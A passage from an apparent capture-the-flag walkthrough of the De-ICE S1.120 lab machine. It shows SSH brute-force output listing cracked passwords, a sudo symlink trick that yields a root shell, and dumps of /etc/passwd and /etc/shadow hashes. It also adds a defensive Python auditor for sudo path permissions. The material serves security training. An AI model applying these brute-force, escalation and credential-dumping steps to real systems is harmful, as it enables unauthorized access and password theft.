[*] Command shell session 7 opened (192.168.1.130:47274 -> 192.168.1.120:22) at 2015-01-08 12:29:11 -0700
[+] 192.168.1.120:22 SSH - Success: 'aweiland:666666' 'uid=1032(aweiland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 8 opened (192.168.1.130:55692 -> 192.168.1.120:22) at 2015-01-08 12:29:15 -0700
[+] 192.168.1.120:22 SSH - Success: 'bbanter:michelle' 'uid=1012(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 9 opened (192.168.1.130:47768 -> 192.168.1.120:22) at 2015-01-08 12:29:19 -0700
[+] 192.168.1.120:22 SSH - Success: 'bphillips:123123' 'uid=1024(bphillips) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 10 opened (192.168.1.130:53612 -> 192.168.1.120:22) at 2015-01-08 12:29:22 -0700
[+] 192.168.1.120:22 SSH - Success: 'bwatkins:123456' 'uid=1037(bwatkins) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 11 opened (192.168.1.130:47820 -> 192.168.1.120:22) at 2015-01-08 12:29:26 -0700
[+] 192.168.1.120:22 SSH - Success: 'cchisholm:baseball' 'uid=1022(cchisholm) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 12 opened (192.168.1.130:54756 -> 192.168.1.120:22) at 2015-01-08 12:29:29 -0700
[+] 192.168.1.120:22 SSH - Success: 'ccoffee:0' 'uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 13 opened (192.168.1.130:55911 -> 192.168.1.120:22) at 2015-01-08 12:29:33 -0700
[+] 192.168.1.120:22 SSH - Success: 'dcooper:sunshine' 'uid=1036(dcooper) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 14 opened (192.168.1.130:47440 -> 192.168.1.120:22) at 2015-01-08 12:29:37 -0700
[+] 192.168.1.120:22 SSH - Success: 'dgilfillan:starwars' 'uid=1014(dgilfillan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 15 opened (192.168.1.130:51523 -> 192.168.1.120:22) at 2015-01-08 12:29:40 -0700
[+] 192.168.1.120:22 SSH - Success: 'dgrant:letmein' 'uid=1015(dgrant) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 16 opened (192.168.1.130:43905 -> 192.168.1.120:22) at 2015-01-08 12:29:43 -0700
[+] 192.168.1.120:22 SSH - Success: 'djohnson:killer' 'uid=1011(djohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 17 opened (192.168.1.130:58887 -> 192.168.1.120:22) at 2015-01-08 12:29:47 -0700
[+] 192.168.1.120:22 SSH - Success: 'dstevens:internet' 'uid=1023(dstevens) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 18 opened (192.168.1.130:42132 -> 192.168.1.120:22) at 2015-01-08 12:29:51 -0700
[+] 192.168.1.120:22 SSH - Success: 'dwestling:shadow' 'uid=1025(dwestling) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 19 opened (192.168.1.130:37133 -> 192.168.1.120:22) at 2015-01-08 12:29:54 -0700
[+] 192.168.1.120:22 SSH - Success: 'hlovell:consumer' 'uid=1021(hlovell) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 20 opened (192.168.1.130:43957 -> 192.168.1.120:22) at 2015-01-08 12:29:57 -0700
[+] 192.168.1.120:22 SSH - Success: 'jalcantar:trustno1' 'uid=1040(jalcantar) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 21 opened (192.168.1.130:36937 -> 192.168.1.120:22) at 2015-01-08 12:30:00 -0700
[+] 192.168.1.120:22 SSH - Success: 'jalvarez:password' 'uid=1013(jalvarez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 22 opened (192.168.1.130:42853 -> 192.168.1.120:22) at 2015-01-08 12:30:04 -0700
[+] 192.168.1.120:22 SSH - Success: 'jayala:abc123' 'uid=1029(jayala) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 23 opened (192.168.1.130:34358 -> 192.168.1.120:22) at 2015-01-08 12:30:07 -0700
[+] 192.168.1.120:22 SSH - Success: 'jbresnahan:blahblah' 'uid=1002(jbresnahan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 24 opened (192.168.1.130:44168 -> 192.168.1.120:22) at 2015-01-08 12:30:10 -0700
[+] 192.168.1.120:22 SSH - Success: 'jduff:princess' 'uid=1020(jduff) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 25 opened (192.168.1.130:45406 -> 192.168.1.120:22) at 2015-01-08 12:30:14 -0700
[+] 192.168.1.120:22 SSH - Success: 'jfranklin:654321' 'uid=1027(jfranklin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 26 opened (192.168.1.130:42125 -> 192.168.1.120:22) at 2015-01-08 12:30:17 -0700
[+] 192.168.1.120:22 SSH - Success: 'kclemons:passw0rd' 'uid=1009(kclemons) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 27 opened (192.168.1.130:50416 -> 192.168.1.120:22) at 2015-01-08 12:30:20 -0700
[+] 192.168.1.120:22 SSH - Success: 'krenfro:master' 'uid=1048(krenfro) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 28 opened (192.168.1.130:51770 -> 192.168.1.120:22) at 2015-01-08 12:30:24 -0700
[+] 192.168.1.120:22 SSH - Success: 'ktso:1234' 'uid=1005(ktso) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 29 opened (192.168.1.130:41473 -> 192.168.1.120:22) at 2015-01-08 12:30:27 -0700
[+] 192.168.1.120:22 SSH - Success: 'kwebber:dragon' 'uid=1016(kwebber) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 30 opened (192.168.1.130:38814 -> 192.168.1.120:22) at 2015-01-08 12:30:30 -0700
[+] 192.168.1.120:22 SSH - Success: 'lmartinez:pepper' 'uid=1034(lmartinez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 31 opened (192.168.1.130:51877 -> 192.168.1.120:22) at 2015-01-08 12:30:34 -0700
[+] 192.168.1.120:22 SSH - Success: 'lmorales:football' 'uid=1028(lmorales) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 32 opened (192.168.1.130:54770 -> 192.168.1.120:22) at 2015-01-08 12:30:37 -0700
[+] 192.168.1.120:22 SSH - Success: 'mbryan:jennifer' 'uid=1042(mbryan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 33 opened (192.168.1.130:45205 -> 192.168.1.120:22) at 2015-01-08 12:30:40 -0700
[+] 192.168.1.120:22 SSH - Success: 'mholland:jordan' 'uid=1041(mholland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 34 opened (192.168.1.130:38046 -> 192.168.1.120:22) at 2015-01-08 12:30:43 -0700
[+] 192.168.1.120:22 SSH - Success: 'mnader:welcome' 'uid=1047(mnader) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 35 opened (192.168.1.130:60899 -> 192.168.1.120:22) at 2015-01-08 12:30:47 -0700
[+] 192.168.1.120:22 SSH - Success: 'mrodriguez:qwerty' 'uid=1026(mrodriguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 36 opened (192.168.1.130:51135 -> 192.168.1.120:22) at 2015-01-08 12:30:50 -0700
[+] 192.168.1.120:22 SSH - Success: 'qpowers:michael' 'uid=1001(qpowers) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 37 opened (192.168.1.130:35915 -> 192.168.1.120:22) at 2015-01-08 12:30:53 -0700
[+] 192.168.1.120:22 SSH - Success: 'rdominguez:12345' 'uid=1010(rdominguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 38 opened (192.168.1.130:53430 -> 192.168.1.120:22) at 2015-01-08 12:30:56 -0700
[+] 192.168.1.120:22 SSH - Success: 'rjacobson:111111' 'uid=1043(rjacobson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 39 opened (192.168.1.130:34041 -> 192.168.1.120:22) at 2015-01-08 12:31:00 -0700
[+] 192.168.1.120:22 SSH - Success: 'rpatel:1234567' 'uid=1045(rpatel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 40 opened (192.168.1.130:34844 -> 192.168.1.120:22) at 2015-01-08 12:31:03 -0700
[+] 192.168.1.120:22 SSH - Success: 'sgains:computer' 'uid=1019(sgains) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 41 opened (192.168.1.130:54407 -> 192.168.1.120:22) at 2015-01-08 12:31:06 -0700
[+] 192.168.1.120:22 SSH - Success: 'sjohnson:12345678' 'uid=1046(sjohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 42 opened (192.168.1.130:40759 -> 192.168.1.120:22) at 2015-01-08 12:31:09 -0700
[+] 192.168.1.120:22 SSH - Success: 'strammel:monkey' 'uid=1006(strammel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 43 opened (192.168.1.130:55731 -> 192.168.1.120:22) at 2015-01-08 12:31:12 -0700
[+] 192.168.1.120:22 SSH - Success: 'swarren:Password' 'uid=1007(swarren) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 44 opened (192.168.1.130:52038 -> 192.168.1.120:22) at 2015-01-08 12:31:16 -0700
[+] 192.168.1.120:22 SSH - Success: 'tdeleon:soccer' 'uid=1038(tdeleon) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 45 opened (192.168.1.130:48251 -> 192.168.1.120:22) at 2015-01-08 12:31:19 -0700
[+] 192.168.1.120:22 SSH - Success: 'tgoodchap:nintendo' 'uid=1030(tgoodchap) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 46 opened (192.168.1.130:36430 -> 192.168.1.120:22) at 2015-01-08 12:31:22 -0700
[-] 192.168.1.120:22 SSH - Failed: ':'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I haven’t cracked root yet, but notice this entry: “‘ccoffee:0’ ‘uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin)”. The 102 admin group is promising.

Linux 2.6.27.27.
ccoffee@slax:~$ ls
DONOTFORGET*  scripts/
ccoffee@slax:~$ cat DONOTFORGET 
remember your 20th anniversary on the 5th!!!!!!!!!1111!!
ccoffee@slax:~$ cd scripts/
ccoffee@slax:~/scripts$ ls
getlogs.sh*
ccoffee@slax:~/scripts$ cat getlogs.sh 
cat: getlogs.sh: Permission denied
ccoffee@slax:~/scripts$

Permission denied!

ccoffee@slax:~$ mv scripts/ scripts.old
ccoffee@slax:~$ mkdir scripts     
ccoffee@slax:~$ ln -s /bin/sh scripts/getlogs.sh
ccoffee@slax:~$ ls -l scripts/getlogs.sh 
lrwxrwxrwx 1 ccoffee users 7 Jan  7 23:03 scripts/getlogs.sh -> /bin/sh*
ccoffee@slax:~$ sudo scripts/getlogs.sh

What this did: the scripts directory I could not read was renamed to scripts.old, a fresh scripts directory was created in its place, and the getlogs.sh inside it is a symlink to /bin/sh. sudo is willing to run that path as root, and because the path lives under ccoffee’s own home directory ccoffee controls what it points at, so sudo scripts/getlogs.sh hands over a root shell. The lesson for the defender is that a sudoers entry is only as strong as the permissions on every directory between / and the target: anything referenced from sudoers belongs in a root-owned, non-writable location such as /usr/local/sbin.
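The check a practitioner would want here, as an added example that is not part of the original walkthrough: walk from each path that sudo -l lists up to / and report the first component the invoking user could replace. The directory tree it builds is a constructed stand-in for the S1.120 layout (the same getlogs.sh under the user’s home and in a root-style location); the uids are whatever the current account has.

```python
"""Added example, not code from the De-ICE walkthrough: audit the paths that
`sudo -l` lists for the weakness that gives ccoffee root on S1.120.

The trick works because sudo runs a script that lives under /home/ccoffee, a
directory ccoffee owns, so ccoffee decides what that path contains.  The
check below walks from a sudo target up to / and reports the first component
the invoking user could swap out.  The tree it builds is a constructed
stand-in for the S1.120 layout; the uids are whatever the current account has.
"""
import os
import shutil
import stat
import tempfile
from typing import Dict, Optional, Tuple


def controllable_component(path: str, invoker_uid: int) -> Optional[str]:
    """Return the first component of `path` (the file, then each parent up to
    /) that a user with `invoker_uid` could replace, or None if the chain is
    safe.

    A component is unsafe when the invoker owns it (they can rename or replace
    it) or when it is group- or world-writable.  A sticky, world-writable
    directory such as /tmp is tolerated: nobody can rename or unlink entries
    they do not own there, so an existing root-owned child stays intact.
    """
    p = os.path.abspath(path)
    while True:
        try:
            st = os.lstat(p)          # lstat: a symlink planted by the user counts
        except FileNotFoundError:
            st = None                 # dangling rule; keep checking the parents
        if st is not None:
            mode = st.st_mode
            writable_by_others = mode & (stat.S_IWGRP | stat.S_IWOTH)
            sticky_dir = stat.S_ISDIR(mode) and mode & stat.S_ISVTX
            if st.st_uid == invoker_uid or (writable_by_others and not sticky_dir):
                return p
        parent = os.path.dirname(p)
        if parent == p:               # reached /
            return None
        p = parent


def build_demo_tree() -> Tuple[str, str, str]:
    """Constructed layout: getlogs.sh under the user's own home, and the same
    script where an admin should have put it.  Returns
    (base, user_script, safe_script)."""
    base = tempfile.mkdtemp(prefix="deice-sudo-")
    user_script = os.path.join(base, "home", "ccoffee", "scripts", "getlogs.sh")
    safe_script = os.path.join(base, "usr", "local", "sbin", "getlogs.sh")
    for script in (user_script, safe_script):
        os.makedirs(os.path.dirname(script))
        with open(script, "w") as fh:
            fh.write("#!/bin/sh\ncat /var/log/messages\n")
        os.chmod(script, 0o755)
    for dirpath, _dirs, _files in os.walk(base):
        os.chmod(dirpath, 0o755)      # plain root-style permissions everywhere
    return base, user_script, safe_script


def run_demo() -> Tuple[Dict[str, Optional[str]], str, str]:
    """Audit the constructed tree three ways.  Returns the findings plus the
    two paths worth comparing against."""
    base, user_script, safe_script = build_demo_tree()
    me = os.getuid()
    someone_else = me + 1             # a uid that owns nothing in the tree
    sbin = os.path.dirname(safe_script)
    findings = {
        "script under the invoker's home": controllable_component(user_script, me),
        "script in a root-owned path": controllable_component(safe_script, someone_else),
    }
    os.chmod(sbin, 0o777)             # the careless-admin variant
    findings["root-owned script behind a world-writable dir"] = controllable_component(safe_script, someone_else)
    shutil.rmtree(base)
    return findings, user_script, sbin


if __name__ == "__main__":
    for label, hit in run_demo()[0].items():
        print(f"{label}: {'replaceable at ' + hit if hit else 'safe'}")
```

Run it as the user named in the sudo rule and feed controllable_component the absolute paths from sudo -l; a non-None result means that rule is a root shell for that user.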

There is no specific challenge so once you are on the system look around and be awesome.

root@slax:/etc# cat passwd      
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
aard:x:1000:100:Aaron Ard:/home/aard:
qpowers:x:1001:100:Quinton Powers:/home/qpowers:
jbresnahan:x:1002:100:Jay Bresnahan:/home/jbresnahan:
aadams:x:1003:100:Adam Adams:/home/aadams:
jdavenport:x:1004:100:James Davenport:/home/jdavenport:
ktso:x:1005:100:Kristen Tso:/home/ktso:
strammel:x:1006:100:Stephanie Trammel:/home/strammel:
swarren:x:1007:100:Samuel Warren:/home/swarren:
myajima:x:1008:100:Moto Yajima:/home/myajima:
kclemons:x:1009:100:Kathryn Clemons:/home/kclemons:
rdominguez:x:1010:100:Rafael Dominguez:/home/rdominguez:
djohnson:x:1011:100:Daniel Johnson:/home/djohnson:
bbanter:x:1012:100:Bob Banter:/home/bbanter:
jalvarez:x:1013:100:Joy Alvarez:/home/jalvarez:
dgilfillan:x:1014:100:Darcy Gilfillan:/home/dgilfillan:
dgrant:x:1015:100:Daniel Grant:/home/dgrant:
kwebber:x:1016:100:Kathleen Webber:/home/kwebber:
aheflin:x:1017:100:Anna Heflin:/home/aheflin:
amaynard:x:1018:100:Arthur Maynard:/home/amaynard:
sgains:x:1019:100:Susan Gains:/home/sgains:
jduff:x:1020:100:Jerry Duff:/home/jduff:
hlovell:x:1021:100:Henrietta Lovell:/home/hlovell:
cchisholm:x:1022:100:Cindy Chisholm:/home/cchisholm:
dstevens:x:1023:100:Donald Stevens:/home/dstevens:
bphillips:x:1024:100:Brad Phillips:/home/bphillips:
dwestling:x:1025:100:David Westling:/home/dwestling:
mrodriguez:x:1026:100:Manuel Rodriguez:/home/mrodriguez:
jfranklin:x:1027:100:Johnny Franklin:/home/jfranklin:
lmorales:x:1028:100:Lindsey Morales:/home/lmorales:
jayala:x:1029:100:John Ayala:/home/jayala:
tgoodchap:x:1030:100:Taj Goodchap:/home/tgoodchap:
aallen:x:1031:100:Aaron Allen:/home/aallen:
aweiland:x:1032:100:Adam Weiland:/home/aweiland:
dtraylor:x:1033:100:Donnie Traylor:/home/dtraylor:
lmartinez:x:1034:100:Luis Martinez:/home/lmartinez:
aspears:x:1035:100:Adam Spears:/home/aspears:
dcooper:x:1036:100:Donald Cooper:/home/dcooper:
bwatkins:x:1037:100:Brandon Watkins:/home/bwatkins:
tdeleon:x:1038:100:Terrence Deleon:/home/tdeleon:
aharp:x:1039:100:Annie Harp:/home/aharp:
jalcantar:x:1040:100:Jesse Alcantar:/home/jalcantar:
mholland:x:1041:100:Marian Holland:/home/mholland:
mbryan:x:1042:100:Michael Bryan:/home/mbryan:
rjacobson:x:1043:100:Randy Jacobson:/home/rjacobson:
ccoffee:x:1044:100:Chad Coffee:/home/ccoffee:
rpatel:x:1045:100:Randall Patel:/home/rpatel:
sjohnson:x:1046:100:Steven Johnson:/home/sjohnson:
mnader:x:1047:100:Muhammad Nader:/home/mnader:
krenfro:x:1048:100:Kimberly Renfro:/home/krenfro:

root@slax:/etc# cat shadow
root:$1$6Hl/leIf$BHG4Z0HgNq2bnbRriQcCt/:16442:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
aard:$1$M/1naIfI$/dpCFIuWISrIGy408fP0U.:16442:0:99999:7:::
qpowers:$1$oDCsaIfI$PlHnGw5Ylqoke4HOfDnz81:16442:0:99999:7:::
jbresnahan:$1$nHExaIfI$xFPgXAOo9ktw2azn/qnbv.:16442:0:99999:7:::
aadams:$1$TzF0bIfI$RvB2GZOb5WDCJX.agChuB1:16442:0:99999:7:::
jdavenport:$1$3wl/neIf$kuBSySXsu5nSeNjMgBRjr1:16442:0:99999:7:::
ktso:$1$t0KAbIfI$WPULPwgsjByt0ICV6.zMS1:16442:0:99999:7:::
strammel:$1$lpLFbIfI$B9wU7zrHALtgO5PpTFEYJ1:16442:0:99999:7:::
swarren:$1$TdNKbIfI$Duy.Uy2sGwqY6YsfTzX4h1:16442:0:99999:7:::
myajima:$1$xJPPbIfI$SQc4btSCHeIIYPVE/.r6a.:16442:0:99999:7:::
kclemons:$1$IURUbIfI$Tpisuh39vd16hd9Q2W198/:16442:0:99999:7:::
rdominguez:$1$PDTZbIfI$xKK6A/ZQiFgWpYVzzd.Gw.:16442:0:99999:7:::
djohnson:$1$buUebIfI$0gd4dWKyVH2.ufk8zSq.z0:16442:0:99999:7:::
bbanter:$1$QWWjbIfI$GoRunRTIFvf9sOfrWttwS0:16442:0:99999:7:::
jalvarez:$1$AHYobIfI$gqSV2utxp46bVc0MzOFCP.:16442:0:99999:7:::
dgilfillan:$1$m0atbIfI$r5vprBT7DmEx/bNqH8RDM1:16442:0:99999:7:::
dgrant:$1$7sbybIfI$8FbpRfuY.N8hX6Sn4A4PX.:16442:0:99999:7:::
kwebber:$1$9hd1cIfI$Hsx2f74tHtVhioZegod8d.:16442:0:99999:7:::
aheflin:$1$waf6cIfI$Yq12oAcx/c176h1LC/MHJ.:16442:0:99999:7:::
amaynard:$1$nFhBcIfI$Q7LRuK3aMzhrdqZD1AjaF0:16442:0:99999:7:::
sgains:$1$U3jGcIfI$pbF6mepdppQgEM1/OnOKS1:16442:0:99999:7:::
jduff:$1$bskLcIfI$0xxI8JWghNZrwknfckK4I1:16442:0:99999:7:::
hlovell:$1$0bmQcIfI$f7yj5xtUFVmGnMtEc0F0M/:16442:0:99999:7:::
cchisholm:$1$2PoVcIfI$g2OHLIwZNfkSEwbkdXL.o/:16442:0:99999:7:::
dstevens:$1$/MqacIfI$YrH3QJethu7PXmEB5cDvB.:16442:0:99999:7:::
bphillips:$1$3BsfcIfI$AnYSJSkRMC5yvbTQIdHPN1:16442:0:99999:7:::
dwestling:$1$nvtkcIfI$WOkUDONlGepzNXM37hzDW1:16442:0:99999:7:::
mrodriguez:$1$LkvpcIfI$UYw1kRIkon2T3Kf/as.hD.:16442:0:99999:7:::
jfranklin:$1$8XxucIfI$5V78VV1YZVUaq2PyRbH82/:16442:0:99999:7:::
lmorales:$1$NOzzcIfI$xHUTPP/Myrqh8iBIF4sH00:16442:0:99999:7:::
jayala:$1$r5//2dIf$WGWmk2GfQETfIqPvnu5Eb.:16442:0:99999:7:::
tgoodchap:$1$Yo0/7dIf$jfLG8/Fv7873kFlascMdg1:16442:0:99999:7:::
aallen:$1$Zm2/CdIf$tonJrOosRTYbCzxTYcBrJ.:16442:0:99999:7:::
aweiland:$1$Jc4/HdIf$Iae3U0Lbu04YjxfO3t8f2/:16442:0:99999:7:::
dtraylor:$1$db6/MdIf$5Wtmc3YxBJkLE3TjSqwX91:16442:0:99999:7:::
lmartinez:$1$DH8/RdIf$vosY88nHAoqwPonN.tMBO1:16442:0:99999:7:::
aspears:$1$.5A/WdIf$lt4KE9Mt01qjJwH0q/TaA.:16442:0:99999:7:::
dcooper:$1$2pB/bdIf$9Bqi7D3JH7nO3YVuiKhfq.:16442:0:99999:7:::
bwatkins:$1$biD/gdIf$PqXD41GXwTEtNnNSNP7ve1:16442:0:99999:7:::
tdeleon:$1$VdF/ldIf$8VVkJorueLDB2XEdwRcvA/:16442:0:99999:7:::
aharp:$1$GjH/qdIf$SXBGXRgsaGwWst2EVA4OK.:16442:0:99999:7:::
